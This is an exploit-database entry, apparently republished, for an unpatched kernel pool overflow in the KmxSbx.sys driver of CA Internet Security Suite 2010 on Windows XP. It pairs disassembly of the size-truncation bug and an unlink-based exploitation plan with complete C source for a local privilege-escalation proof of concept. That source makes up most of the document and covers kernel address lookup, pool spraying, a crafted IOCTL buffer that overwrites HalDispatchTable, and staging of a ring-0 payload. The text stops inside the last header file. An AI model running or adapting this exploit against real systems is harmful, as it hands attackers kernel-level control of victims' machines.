CA Internet Security Suite 2010 KmxSbx.sys Kernel Pool Overflow 0 day Exploit
来源:http://www.exploit-db.com/exploits/15624/ 作者:Tarakanov 发布时间:2010-11-29  

/*
# Exploit Title: CA Internet Security Suite 2010 KmxSbx.sys Kernel Pool
Overflow 0-day Exploit
# Date: 2010-11-28
# Author: Nikita Tarakanov (CISS Research Team)
# Software Link:
http://shop.ca.com/ca/products/internetsecurity/internetsecurity_suite.asp
# Version: up to date, KmxSbx.sys version 6.2.0.22
# Tested on: Win XP SP3
# CVE : CVE-NO-MATCH
# Status : Unpatched
*/

1.Description:

The KmxSbx.sys kernel driver distributed with CA Internet Security Suite contains
a pool corruption vulnerability in the handler for IOCTL 0x88000080.
The handler measures a caller-supplied UNICODE string, adds 0x50, and then
truncates that size to 16 bits before passing it to ExAllocatePool
(NonPagedPool), while the subsequent copy loop runs to the string's real
terminator. A string of roughly 64 KB or more therefore overflows an
undersized non-paged pool chunk (see the disassembly in section 2).
Exploitation of this issue allows an attacker to execute arbitrary code
within the kernel.
An attacker needs local access to a vulnerable computer and must be able to
open the \\.\KmxSbx device; the PoC opens it with GENERIC_READ|GENERIC_WRITE.

 

Affected application: CA Internet Security Suite 2010.
Affected file: KmxSbx.sys version 6.2.0.22.

2.Vulnerability details:


[..]

.text:00016330                 mov     cx, [eax]       ; eax walks the attacker-controlled UNICODE string (edx holds its start)
.text:00016333                 inc     eax
.text:00016334                 inc     eax
.text:00016335                 test    cx, cx
.text:00016338                 jnz     short loc_16330
.text:0001633A                 sub     eax, edx        ; byte length, terminator included
.text:0001633C                 sar     eax, 1          ; -> character count
.text:0001633E                 lea     eax, [eax+eax+50h] ; size of UNICODE string + 0x50 bytes
.text:00016342                 movzx   edi, ax         ; integer wrap here! only the low 16 bits survive, so a string of
                                                       ; ~64 KB or more yields a small allocation (the PoC lands on 0xFF0)
.text:00016345
.text:00016345 loc_16345:                              ; CODE XREF: sub_162D8+53j
.text:00016345                 movzx   eax, di
.text:00016348                 push    ebx
.text:00016349                 xor     ebx, ebx
.text:0001634B                 cmp     eax, ebx
.text:0001634D                 jz      short loc_16359 ; only a zero size is rejected; the wrapped size passes
.text:0001634F                 push    eax             ; NumberOfBytes (truncated)
.text:00016350                 push    ebx             ; PoolType = 0 (NonPagedPool)
.text:00016351                 call    ds:ExAllocatePool ; Miscalculated Pool!!! the chunk is smaller than the string
.text:00016357                 mov     ebx, eax

[..]

.text:000163A6                 movzx   esi, word ptr [edx]
.text:000163A9                 mov     [eax+edx], si   ; Pool overflow here! the copy runs to the string's real terminator, not to the allocated size
.text:000163AD                 inc     edx
.text:000163AE                 inc     edx
.text:000163AF                 test    si, si

 


3.Exploitation:


1. To exploit this vulnerability we allocate the ring-0 shellcode at a known
user-mode address and place a fake pool chunk header (marked as free) right
after the undersized chunk; when that "free" neighbour is unlinked, its
Flink/Blink pair gives us a write-4 primitive.
2. To invoke the shellcode we set Flink to the shellcode address and Blink to
a kernel pointer worth overwriting (the PoC uses HalDispatchTable+4, i.e.
xHalQuerySystemInformation). The unlink writes Flink into *Blink, so a
subsequent NtQueryIntervalProfile call dispatches through the overwritten
pointer and runs our code with kernel privileges (CPL == 0). The unlink's
second write (Flink->Blink = Blink) lands inside the shellcode, which is why
the PoC starts with a short jmp over those bytes.
*3. Pool repair — not implemented in the PoC: the payload displays a banner
and resets the machine instead of returning to the corrupted pool.

Exploit code is in CAInternetSecuritySuite2010.zip file.

http://www.exploit-db.com/sploits/CAInternetSecuritySuite2010.zip

----------------------------KmxSBx_LPE_POC.c--------------------

 

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include "KmxSbx_LPE_POC.h"
#include "InvbShellCode.h"


#define THREADCOUNT 0x10

/* Unused in the current flow (its memcpy is commented out in main): a
 * `jmp $` that would park the CPU instead of running the payload. */
static unsigned char freeze[] =
  "\xeb\xfe";//jmp $ (jump to self)
/* First bytes placed at zpage+1: `jmp short +6` lands at zpage+9, where the
 * raw payload is copied, skipping the bytes at zpage+5..+8 that the pool
 * unlink (Flink->Blink = Blink) is expected to overwrite -- see main(). */
static unsigned char near_jump_2_r0_shellcode[] =
  "\xeb\x06";//jmp +8 (measured from the jmp itself: 2-byte opcode + 6)

 

DWORD WINAPI ForceToAllocSpace(LPVOID lpParam);

 

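/*
 * PoC entry point.  The sequence is order-sensitive (pool layout):
 *   1. locate the running kernel (SystemModuleInformation entry 0), map a
 *      copy of it with LdrLoadDll and rebase HalDispatchTable;
 *   2. resolve the Inbv* exports the payload calls (XxInitInbv);
 *   3. stage the ring-0 payload in an RWX user page;
 *   4. spray 0xFF0-byte non-paged pool chunks from THREADCOUNT threads;
 *   5. send the oversized request that overflows an undersized chunk and
 *      plants a fake free-chunk header whose Flink/Blink unlink writes the
 *      payload address over HalDispatchTable[1];
 *   6. call NtQueryIntervalProfile, which dispatches through that entry.
 *
 * 32-bit XP only: addresses are narrowed to ULONG and the payload is raw
 * x86 that relies on user pages being executable from ring 0.
 * argc/argv are unused.  Returns 0, or a failing (non-zero) NTSTATUS.
 */
int main(int argc, char **argv)
{
    HANDLE hDevice;
    HANDLE hThr[THREADCOUNT];
    char *inbuff;
    DWORD ioctl = 0x88000080, in = 0x1C000, out = 0x100, len = 0, i;
    DWORD fake_header = 0x201ff, first_dword = 0x400;
    DWORD r0_shellcode_addr, r0_pointer_addr, junk = 0;
    LPVOID zpage;
    NTSTATUS NtStatus;
    ULONG AllocationSize = PAGE_SIZE * 64;
    ULONG ImageBase;
    PVOID MappedBase;
    UCHAR ImageName[KERNEL_NAME_LENGTH];
    ULONG DllCharacteristics = DONT_RESOLVE_DLL_REFERENCES;
    PVOID HalDispatchTable;
    PVOID xHalQuerySystemInformation;
    PSYSTEM_MODULE_INFORMATION_EX ModuleInformation = NULL;
    UNICODE_STRING DllName;
    ANSI_STRING ProcedureName;

    (void)argc;
    (void)argv;

    /* ---- 1. kernel image base and file name ----------------------------- */
    NtStatus = NtAllocateVirtualMemory(NtCurrentProcess(),
                                       (PVOID *)&ModuleInformation,
                                       0,
                                       &AllocationSize,
                                       MEM_COMMIT,
                                       PAGE_READWRITE);
    if (NtStatus)
    {
        printf(" [*] NtStatus of NtAllocateVirtualMemory [1] - 0x%.8X\n", NtStatus);
        return NtStatus;
    }

    /* 256 KiB must hold the whole module list; a larger list now fails
     * loudly instead of being read back as garbage. */
    NtStatus = NtQuerySystemInformation(SystemModuleInformation,
                                        ModuleInformation,
                                        AllocationSize,
                                        NULL);
    if (NtStatus)
    {
        printf(" [*] NtStatus of NtQuerySystemInformation - 0x%.8X\n", NtStatus);
        return NtStatus;
    }

    /* The PoC treats entry 0 as the kernel.  ModuleNameOffset points at the
     * file-name part of the path; KERNEL_NAME_LENGTH (13) copies a 12-char
     * name plus NUL -- presumably ntoskrnl.exe / ntkrnlpa.exe.  A longer
     * kernel file name would be truncated (TODO confirm for the target). */
    ImageBase = (ULONG)(ModuleInformation->Modules[0].Base);
    RtlMoveMemory(ImageName,
                  (PVOID)(ModuleInformation->Modules[0].ImageName +
                          ModuleInformation->Modules[0].ModuleNameOffset),
                  KERNEL_NAME_LENGTH);

    NtStatus = NtFreeVirtualMemory(NtCurrentProcess(),
                                   (PVOID *)&ModuleInformation,
                                   &AllocationSize,
                                   MEM_DECOMMIT);
    if (NtStatus)
    {
        printf(" [*] NtStatus of NtFreeVirtualMemory [1] - 0x%.8X\n", NtStatus);
        return NtStatus;
    }

    /* ---- 2. map the kernel as a plain DLL and rebase HalDispatchTable --- */
    RtlCreateUnicodeStringFromAsciiz(&DllName, (PUCHAR)ImageName);

    NtStatus = LdrLoadDll(NULL,                /* DllPath */
                          &DllCharacteristics, /* DONT_RESOLVE_DLL_REFERENCES */
                          &DllName,
                          &MappedBase);
    /* DllName.Buffer was heap-allocated by RtlCreateUnicodeStringFromAsciiz;
     * the loader does not keep a reference to it. */
    RtlFreeUnicodeString(&DllName);
    if (NtStatus)
    {
        printf(" [*] NtStatus of LdrLoadDll - 0x%.8X\n", NtStatus);
        return NtStatus;
    }

    RtlInitAnsiString(&ProcedureName, (PUCHAR)"HalDispatchTable");

    NtStatus = LdrGetProcedureAddress(MappedBase,
                                      &ProcedureName,
                                      0,
                                      &HalDispatchTable);
    if (NtStatus)
    {
        printf(" [*] NtStatus of LdrGetProcedureAddress - 0x%.8X\n", NtStatus);
        return NtStatus;
    }

    /* Export RVAs are the same in our user mapping and in the real kernel. */
    HalDispatchTable = (PVOID)((ULONG)HalDispatchTable - (ULONG)MappedBase + ImageBase);

    /* HalDispatchTable[1] is the pointer NtQueryIntervalProfile ends up
     * calling through -- this is the slot the unlink will overwrite. */
    xHalQuerySystemInformation = (PVOID)((ULONG)HalDispatchTable + sizeof(ULONG));

    printf( " |                                                                            |\n"
            " | HalDispatchTable - 0x%.8x                                              |\n"
            " | xHalQuerySystemInformation - 0x%.8x                                    |\n"
            " +----------------------------------------------------------------------------+\n",
            (ULONG)HalDispatchTable,
            (ULONG)xHalQuerySystemInformation);

    NtStatus = XxInitInbv(ImageBase, (ULONG)MappedBase);
    if (NtStatus)
    {
        printf(" [*] NtStatus of XxInitInbv - 0x%.8X\n", NtStatus);
        return NtStatus;
    }

    /* ---- 3. stage the payload ------------------------------------------- */
    zpage = VirtualAlloc(NULL, 0x2000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (zpage == NULL)
    {
        printf("VirtualAlloc failed\n");
        return 0;
    }
    printf("Ring 0 shellcode at 0x%08X address\n", (DWORD)zpage + 1);

    /* Layout: zpage+1: `jmp short +6`; zpage+5..+8: scratch that the unlink's
     * second write (Flink->Blink = Blink) presumably lands on; zpage+9: the
     * raw body of InbvShellCode (0x1000 bytes copied blindly from its entry). */
    memset(zpage, 0xCC, 0x1000);
    memcpy((PCHAR)zpage + 1, near_jump_2_r0_shellcode, sizeof(near_jump_2_r0_shellcode) - 1);
    memcpy((PCHAR)zpage + 9, InbvShellCode, 0x1000);

    /* ---- 4. open the device and build the trigger request --------------- */
    hDevice = CreateFileA("\\\\.\\KmxSbx",
                          GENERIC_READ|GENERIC_WRITE,
                          0,
                          0,
                          OPEN_EXISTING,
                          0,
                          NULL);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("Error: Error opening device \n");
        return 0;
    }
    printf("Device succesfully opened!\n");

    inbuff = malloc(0x1C000);
    if (!inbuff)
    {
        printf("malloc failed!\n");
        CloseHandle(hDevice);
        return 0;
    }

    /* Request layout (author's analysis, section 2): first DWORD 0x400, then
     * a UNICODE string of 'A's terminated at 0x11032.  The driver's
     * (length + 0x50) computation wraps to 0xFF0 for this length, while the
     * copy runs to the real terminator -> pool overflow. */
    memset(inbuff, 'A', 0x1C000);
    memset(inbuff + 0x11032, 0x00, 2);

    /* Fake pool header at the position of the chunk following the
     * undersized allocation (author's offsets): PreviousSize 0x1FF,
     * PoolIndex 0, BlockSize 2, PoolType 0 = free, then its LIST_ENTRY.
     * When that "free" neighbour is coalesced the kernel unlinks it:
     *   Blink->Flink = Flink  ->  HalDispatchTable[1] = payload
     *   Flink->Blink = Blink  ->  payload+4 = &HalDispatchTable[1] (skipped by the jmp) */
    memcpy(inbuff + 0x1050, &fake_header, 4);
    r0_shellcode_addr = (DWORD)zpage + 1;
    r0_pointer_addr = (DWORD)xHalQuerySystemInformation;
    memcpy(inbuff + 0x1058, &r0_shellcode_addr, 0x4);   /* Flink */
    memcpy(inbuff + 0x105C, &r0_pointer_addr, 0x4);     /* Blink */

    memcpy(inbuff, &first_dword, sizeof(DWORD));

    /* ---- 5. spray, then trigger ----------------------------------------- */
    for (i = 0; i < THREADCOUNT; i++)
    {
        DWORD ThreadId;
        hThr[i] = CreateThread(NULL, 0, ForceToAllocSpace, hDevice, 0, &ThreadId);
        if (hThr[i] == NULL)
        {
            printf("CreateThread failed (%lu)\n", GetLastError());
            break;
        }
    }

    /* bWaitAll must be TRUE: the original waited for *any one* thread, so
     * the trigger could race the remaining spray threads. */
    if (i > 0)
        WaitForMultipleObjects(i, hThr, TRUE, INFINITE);
    while (i > 0)
        CloseHandle(hThr[--i]);

    if (!DeviceIoControl(hDevice, ioctl, inbuff, in, inbuff, out, &len, NULL))
        printf("DeviceIoControl reported failure (%lu); the overflow may still have occurred\n",
               GetLastError());

    /* ---- 6. fire HalDispatchTable[1] ------------------------------------ */
    /* If the overwrite succeeded this never returns: the payload resets
     * the machine.  Source/Interval values are irrelevant. */
    NtStatus = NtQueryIntervalProfile(ProfileTotalIssues, &junk);
    if (NtStatus)
        printf(" [*] NtStatus of NtQueryIntervalProfile - 0x%.8X\n", NtStatus);

    Sleep(1000000);

    free(inbuff);
    CloseHandle(hDevice);
    return 0;
}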

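/*
 * Pool-spray worker.  Sends the vulnerable IOCTL 16 times with a request
 * whose UNICODE string is terminated at 0x1032, which -- per the author's
 * analysis -- makes the driver allocate a 0xFF0-byte non-paged chunk each
 * time: the same size class the trigger's wrapped size lands in, so the
 * overflowed chunk is likely to be followed by one of these.
 *
 * lpParam is the open \\.\KmxSbx device handle.  Returns the number of
 * DeviceIoControl calls that reported failure (0 on allocation failure of
 * the local buffer); the driver's status semantics are not known, so the
 * count is informational only.
 */
DWORD WINAPI ForceToAllocSpace(LPVOID lpParam)
{
    HANDLE hDev = (HANDLE)lpParam;
    DWORD in = 0x1C00, out = 0x100, ioctl = 0x88000080, first_dword = 0x400;
    DWORD len = 0, failures = 0, i;
    char *inbuff;

    inbuff = malloc(0x1C00);
    if (!inbuff)
    {
        printf("malloc failed!\n");
        return 0;
    }

    /* The request is identical every round; build it once. */
    memset(inbuff, 'A', 0x1C00);
    memset(inbuff + 0x1032, 0x00, 2);   /* end of unicode, size to allocate 0xff0 */
    memcpy(inbuff, &first_dword, sizeof(DWORD));

    for (i = 0; i < 0x10; i++)
    {
        if (!DeviceIoControl(hDev, ioctl, inbuff, in, inbuff, out, &len, NULL))
            failures++;
    }

    /* METHOD_BUFFERED (low two bits of the IOCTL are 0): the I/O manager
     * copied the request, so the user buffer is not referenced after the
     * synchronous call returns. */
    free(inbuff);

    return failures;
}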

------------------------------KmxSBx_LPE_POC.h---------------

/* Minimal native-API glue so the PoC does not need the WDK headers.
 * Everything here assumes a 32-bit process (see NtCurrentProcess). */
#define IMP_VOID __declspec(dllimport) VOID __stdcall
#define IMP_SYSCALL __declspec(dllimport) NTSTATUS __stdcall

#define PAGE_SIZE 0x1000

#define OBJ_CASE_INSENSITIVE 0x00000040
#define FILE_OPEN_IF 0x00000003

/* Pseudo-handle for the current process, i.e. (HANDLE)-1 spelled out for 32-bit. */
#define NtCurrentProcess() ((HANDLE)0xFFFFFFFF)

/* Bytes copied for the kernel file name in main(): a 12-character name plus NUL
 * (presumably ntoskrnl.exe / ntkrnlpa.exe). */
#define KERNEL_NAME_LENGTH 0x0D

#define STATUS_SUCCESS 0x00000000

/* Declared unsigned here; the PoC only tests statuses for non-zero. */
typedef ULONG NTSTATUS;

/* Counted narrow string handed to RtlInitAnsiString / LdrGetProcedureAddress below. */
typedef struct ANSI_STRING
{
    /* 0x00 */ USHORT Length;
    /* 0x02 */ USHORT MaximumLength;
    /* 0x04 */ PCHAR Buffer;
    /* 0x08 */
}
    ANSI_STRING,
  *PANSI_STRING,
**PPANSI_STRING;

/* Counted wide string; main() builds one with RtlCreateUnicodeStringFromAsciiz
 * (which allocates Buffer) and passes it to LdrLoadDll. */
typedef struct _UNICODE_STRING
{
    /* 0x00 */ USHORT Length;
    /* 0x02 */ USHORT MaximumLength;
    /* 0x04 */ PWSTR Buffer;
    /* 0x08 */
}
    UNICODE_STRING,
  *PUNICODE_STRING,
**PPUNICODE_STRING;

/* Only referenced by the NtCreateFile prototype below; the PoC opens the
 * device with the Win32 CreateFileA instead and never fills one of these. */
typedef struct _OBJECT_ATTRIBUTES
{
    /* 0x00 */ ULONG Length;
    /* 0x04 */ HANDLE RootDirectory;
    /* 0x08 */ PUNICODE_STRING ObjectName;
    /* 0x0C */ ULONG Attributes;
    /* 0x10 */ PSECURITY_DESCRIPTOR SecurityDescriptor;
    /* 0x14 */ PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
    /* 0x18 */
}
    OBJECT_ATTRIBUTES,
  *POBJECT_ATTRIBUTES,
**PPOBJECT_ATTRIBUTES;

/* Referenced by the NtCreateFile / NtDeviceIoControlFile prototypes below;
 * the PoC uses the Win32 DeviceIoControl wrapper and never touches one. */
typedef struct _IO_STATUS_BLOCK
{
    union
    {
        /* 0x00 */ NTSTATUS Status;
        /* 0x00 */ PVOID Pointer;
    };

    /* 0x04 */ ULONG Information;
    /* 0x08 */
}
    IO_STATUS_BLOCK,
  *PIO_STATUS_BLOCK,
**PPIO_STATUS_BLOCK;

/* Information classes for NtQuerySystemInformation.  The PoC only uses
 * SystemModuleInformation (value 11) to find the kernel image; the other
 * names follow the unofficial listing commonly reproduced in exploit code
 * and are not relied upon. */
typedef enum _SYSTEM_INFORMATION_CLASS
{
    SystemBasicInformation,
    SystemProcessorInformation,
    SystemPerformanceInformation,
    SystemTimeOfDayInformation,
    SystemNotImplemented1,
    SystemProcessesAndThreadsInformation,
    SystemCallCounts,
    SystemConfigurationInformation,
    SystemProcessorTimes,
    SystemGlobalFlag,
    SystemNotImplemented2,
    SystemModuleInformation,        /* 11: loaded-module list, see main() */
    SystemLockInformation,
    SystemNotImplemented3,
    SystemNotImplemented4,
    SystemNotImplemented5,
    SystemHandleInformation,
    SystemObjectInformation,
    SystemPagefileInformation,
    SystemInstructionEmulationCounts,
    SystemInvalidInfoClass1,
    SystemCacheInformation,
    SystemPoolTagInformation,
    SystemProcessorStatistics,
    SystemDpcInformation,
    SystemNotImplemented6,
    SystemLoadImage,
    SystemUnloadImage,
    SystemTimeAdjustment,
    SystemNotImplemented7,
    SystemNotImplemented8,
    SystemNotImplemented9,
    SystemCrashDumpInformation,
    SystemExceptionInformation,
    SystemCrashDumpStateInformation,
    SystemKernelDebuggerInformation,
    SystemContextSwitchInformation,
    SystemRegistryQuotaInformation,
    SystemLoadAndCallImage,
    SystemPrioritySeparation,
    SystemNotImplemented10,
    SystemNotImplemented11,
    SystemInvalidInfoClass2,
    SystemInvalidInfoClass3,
    SystemTimeZoneInformation,
    SystemLookasideInformation,
    SystemSetTimeSlipEvent,
    SystemCreateSession,
    SystemDeleteSession,
    SystemInvalidInfoClass4,
    SystemRangeStartInformation,
    SystemVerifierInformation,
    SystemAddVerifier,
    SystemSessionProcessesInformation
} SYSTEM_INFORMATION_CLASS;

/* One loaded-module record of the SystemModuleInformation buffer.  main()
 * reads Base, ImageName and ModuleNameOffset of entry 0 (the kernel);
 * ModuleNameOffset is the offset of the file name within ImageName. */
typedef struct _SYSTEM_MODULE_INFORMATION
{
    /* 0x0000 */ ULONG Reserved[2];
    /* 0x0008 */ PVOID Base;
    /* 0x000C */ ULONG Size;
    /* 0x0010 */ ULONG Flags;
    /* 0x0014 */ USHORT Index;
    /* 0x0016 */ USHORT Unknown;
    /* 0x0018 */ USHORT LoadCount;
    /* 0x001A */ USHORT ModuleNameOffset;
    /* 0x001C */ UCHAR ImageName[256];
    /* 0x011C */
}
    SYSTEM_MODULE_INFORMATION,
  *PSYSTEM_MODULE_INFORMATION,
**PPSYSTEM_MODULE_INFORMATION;

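/* Header of the SystemModuleInformation buffer: a count followed by that
 * many SYSTEM_MODULE_INFORMATION records (the PoC treats record 0 as the
 * kernel).  Declared with a C99 flexible array member; the original
 * `Modules[0]` is a compiler extension with the same layout (Modules at
 * offset 4), so callers are unaffected. */
typedef struct _SYSTEM_MODULE_INFORMATION_EX
{
    /* 0x00 */ ULONG ModulesCount;
    /* 0x04 */ SYSTEM_MODULE_INFORMATION Modules[];
    /* 0xXX */
}
    SYSTEM_MODULE_INFORMATION_EX,
  *PSYSTEM_MODULE_INFORMATION_EX,
**PPSYSTEM_MODULE_INFORMATION_EX;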

/* Profile sources for NtQueryIntervalProfile.  main() passes
 * ProfileTotalIssues (2); the value itself is irrelevant -- the call is made
 * only because it ends up dispatching through HalDispatchTable[1], the
 * pointer the exploit overwrites. */
typedef enum _KPROFILE_SOURCE
{
    ProfileTime,
    ProfileAlignmentFixup,
    ProfileTotalIssues,             /* 2: used by main() */
    ProfilePipelineDry,
    ProfileLoadInstructions,
    ProfilePipelineFrozen,
    ProfileBranchInstructions,
    ProfileTotalNonissues,
    ProfileDcacheMisses,
    ProfileIcacheMisses,
    ProfileCacheMisses,
    ProfileBranchMispredictions,
    ProfileStoreInstructions,
    ProfileFpInstructions,
    ProfileIntegerInstructions,
    Profile2Issue,
    Profile3Issue,
    Profile4Issue,
    ProfileSpecialInstructions,
    ProfileTotalCycles,
    ProfileIcacheIssues,
    ProfileDcacheAccesses,
    ProfileMemoryBarrierCycles,
    ProfileLoadLinkedIssues,
    ProfileMaximum
} KPROFILE_SOURCE;

/* Completion-routine type used only by the NtDeviceIoControlFile prototype. */
typedef VOID (NTAPI *PIO_APC_ROUTINE)
(
    IN PVOID ApcContext,
    IN PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG Reserved
);

/*
 * ntdll.dll imports.  IMP_VOID / IMP_SYSCALL expand to __declspec(dllimport)
 * __stdcall declarations, so the binary must be linked against ntdll.lib.
 * Only the functions used by the .c files are annotated; the rest are
 * declared but unused by this PoC.
 */

/* Points DestinationString at SourceString -- no allocation, so do NOT
 * pair it with RtlFreeAnsiString. */
IMP_VOID RtlInitAnsiString
(
    IN OUT PANSI_STRING  DestinationString,
    IN PUCHAR SourceString
);

IMP_VOID RtlInitUnicodeString
(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
);

/* Allocates DestinationString->Buffer; release with RtlFreeUnicodeString. */
IMP_VOID RtlCreateUnicodeStringFromAsciiz
(
    OUT PUNICODE_STRING DestinationString, 
    IN PUCHAR SourceString
);

IMP_VOID RtlFreeUnicodeString
(
    IN PUNICODE_STRING UnicodeString
);

/* Frees a heap-allocated Buffer; invalid for strings set up by RtlInitAnsiString. */
IMP_VOID RtlFreeAnsiString
(
    IN PANSI_STRING AnsiString
);

/* main() uses this to map the kernel image into the process with
 * DONT_RESOLVE_DLL_REFERENCES, purely to read its export table. */
IMP_SYSCALL LdrLoadDll
(
    IN PWSTR DllPath OPTIONAL,
    IN PULONG DllCharacteristics OPTIONAL,
    IN PUNICODE_STRING DllName,
    OUT PVOID *DllHandle
);

IMP_SYSCALL LdrUnloadDll
(
    IN PVOID DllHandle
);

/* Export lookup in the mapped kernel image (by name; ProcedureNumber unused). */
IMP_SYSCALL LdrGetProcedureAddress
(
    IN PVOID DllHandle,
    IN PANSI_STRING ProcedureName OPTIONAL,
    IN ULONG ProcedureNumber OPTIONAL,
    OUT PVOID *ProcedureAddress
);

IMP_SYSCALL NtAllocateVirtualMemory
(
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN ULONG ZeroBits,
    IN OUT PULONG AllocationSize,
    IN ULONG AllocationType,
    IN ULONG Protect
);

IMP_SYSCALL NtFreeVirtualMemory
(
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN OUT PULONG FreeSize,
    IN ULONG FreeType
);

/* Used with SystemModuleInformation to obtain the kernel's load address. */
IMP_SYSCALL NtQuerySystemInformation
(
    IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength OPTIONAL
);

IMP_SYSCALL NtCreateFile
(
    OUT PHANDLE FileHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PLARGE_INTEGER AllocationSize OPTIONAL,
    IN ULONG FileAttributes,
    IN ULONG ShareAccess,
    IN ULONG CreateDisposition,
    IN ULONG CreateOptions,
    IN PVOID EaBuffer OPTIONAL,
    IN ULONG EaLength
);

IMP_SYSCALL NtDeviceIoControlFile
(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG IoControlCode,
    IN PVOID InputBuffer OPTIONAL,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer OPTIONAL,
    IN ULONG OutputBufferLength
);

IMP_SYSCALL NtDelayExecution
(
    IN BOOLEAN Alertable,
    IN PLARGE_INTEGER Interval
);

/* The trigger: its kernel path calls through HalDispatchTable[1], which the
 * pool unlink has pointed at the ring-0 payload. */
IMP_SYSCALL NtQueryIntervalProfile
(
    IN KPROFILE_SOURCE Source,
    OUT PULONG Interval
);

IMP_SYSCALL NtClose
(
    IN HANDLE Handle
);

--------------------------InvbShellcode.h----------------------

#include <stdio.h>

/* Boot-video (Inbv*) kernel exports used by the ring-0 payload.  Each slot
 * is filled by XxInitInbv with the export's *kernel* address (rebased from
 * the user-mode mapping of ntoskrnl); InbvShellCode then calls through
 * them.  They are defined here rather than declared extern because this
 * header is included exactly once, by the PoC's .c file. */
typedef VOID (*INBV_DISPLAY_STRING_FILTER)
(
    PUCHAR *String
);

VOID (__stdcall *InbvAcquireDisplayOwnership)
(
    VOID
);

VOID (__stdcall *InbvDisplayString)
(
    IN PCHAR String
);

VOID (__stdcall *InbvEnableDisplayString)
(
    IN BOOLEAN Enable
);

VOID (__stdcall *InbvInstallDisplayStringFilter)
(
    IN INBV_DISPLAY_STRING_FILTER Filter
);

VOID (__stdcall *InbvResetDisplay)
(
    VOID
);

VOID (__stdcall *InbvSetScrollRegion)
(
    IN ULONG Left,
    IN ULONG Top,
    IN ULONG Width,
    IN ULONG Height
);

VOID (__stdcall *InbvSetTextColor)
(
    IN ULONG Color
);

VOID (__stdcall *InbvSolidColorFill)
(
    IN ULONG Left,
    IN ULONG Top,
    IN ULONG Width,
    IN ULONG Height,
    IN ULONG Color
);

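/*
 * Resolve one ntoskrnl export to its *kernel* address.
 *
 * MappedBase is where LdrLoadDll mapped the kernel image in this process
 * (DONT_RESOLVE_DLL_REFERENCES: only the export table is of interest);
 * ImageBase is the real load address reported by SystemModuleInformation.
 * An export's RVA is identical in both mappings, so
 *     kernel address = (mapped address - MappedBase) + ImageBase.
 *
 * On success *Slot receives the kernel address and STATUS_SUCCESS is
 * returned; otherwise the NTSTATUS from LdrGetProcedureAddress is returned
 * after a diagnostic and *Slot is left untouched.
 */
static NTSTATUS XxResolveKernelExport(IN ULONG ImageBase, IN ULONG MappedBase,
                                      IN PCHAR Name, OUT PVOID *Slot)
{
    NTSTATUS NtStatus;
    ANSI_STRING ProcedureName;
    PVOID Mapped = NULL;

    /* RtlInitAnsiString only points at Name -- nothing is allocated, so
     * there must be no RtlFreeAnsiString for it (the original called
     * RtlFreeAnsiString on a string literal, i.e. a bogus RtlFreeHeap). */
    RtlInitAnsiString(&ProcedureName, (PUCHAR)Name);

    NtStatus = LdrGetProcedureAddress((PVOID)MappedBase,   /* DllHandle */
                                      &ProcedureName,      /* ProcedureName */
                                      0,                   /* ProcedureNumber OPTIONAL */
                                      &Mapped);            /* ProcedureAddress */
    if(NtStatus)
    {
        printf(" [*] NtStatus of LdrGetProcedureAddress - %s - 0x%.8X\n", Name, NtStatus);
        return NtStatus;
    }

    *Slot = (PVOID)((ULONG)Mapped - MappedBase + ImageBase);
    return STATUS_SUCCESS;
}

/*
 * Fill the Inbv* function-pointer globals above with the kernel addresses
 * of the corresponding ntoskrnl exports and print them.
 *
 * ImageBase  - real kernel load address (from SystemModuleInformation).
 * MappedBase - user-mode mapping of the same image created by LdrLoadDll.
 *
 * Returns STATUS_SUCCESS, or the first failing lookup's NTSTATUS; on
 * failure the globals resolved so far are set and the rest are untouched.
 */
NTSTATUS XxInitInbv(IN ULONG ImageBase, IN ULONG MappedBase)
{
    NTSTATUS NtStatus;
    ULONG i;
    /* Lookup order is the same as the original's sequence of calls. */
    struct { PCHAR Name; PVOID *Slot; } Exports[] = {
        { "InbvAcquireDisplayOwnership",    (PVOID *)&InbvAcquireDisplayOwnership    },
        { "InbvResetDisplay",               (PVOID *)&InbvResetDisplay               },
        { "InbvSolidColorFill",             (PVOID *)&InbvSolidColorFill             },
        { "InbvSetTextColor",               (PVOID *)&InbvSetTextColor               },
        { "InbvInstallDisplayStringFilter", (PVOID *)&InbvInstallDisplayStringFilter },
        { "InbvEnableDisplayString",        (PVOID *)&InbvEnableDisplayString        },
        { "InbvSetScrollRegion",            (PVOID *)&InbvSetScrollRegion            },
        { "InbvDisplayString",              (PVOID *)&InbvDisplayString              },
    };

    for (i = 0; i < sizeof(Exports) / sizeof(Exports[0]); i++)
    {
        NtStatus = XxResolveKernelExport(ImageBase, MappedBase, Exports[i].Name, Exports[i].Slot);
        if (NtStatus)
            return NtStatus;
    }

    printf(" +----------------------------------------------------------------------------+\n"
           " | InbvAcquireDisplayOwnership - 0x%.8X                                   |\n"
           " | InbvResetDisplay - 0x%.8X                                              |\n"
           " | InbvSolidColorFill - 0x%.8X                                            |\n"
           " | InbvSetTextColor - 0x%.8X                                              |\n"
           " | InbvInstallDisplayStringFilter - 0x%.8X                                |\n"
           " | InbvEnableDisplayString - 0x%.8X                                       |\n"
           " | InbvSetScrollRegion - 0x%.8X                                           |\n"
           " | InbvDisplayString - 0x%.8X                                             |\n"
           " +----------------------------------------------------------------------------+\n\n",
           (ULONG)InbvAcquireDisplayOwnership,
           (ULONG)InbvResetDisplay,
           (ULONG)InbvSolidColorFill,
           (ULONG)InbvSetTextColor,
           (ULONG)InbvInstallDisplayStringFilter,
           (ULONG)InbvEnableDisplayString,
           (ULONG)InbvSetScrollRegion,
           (ULONG)InbvDisplayString);

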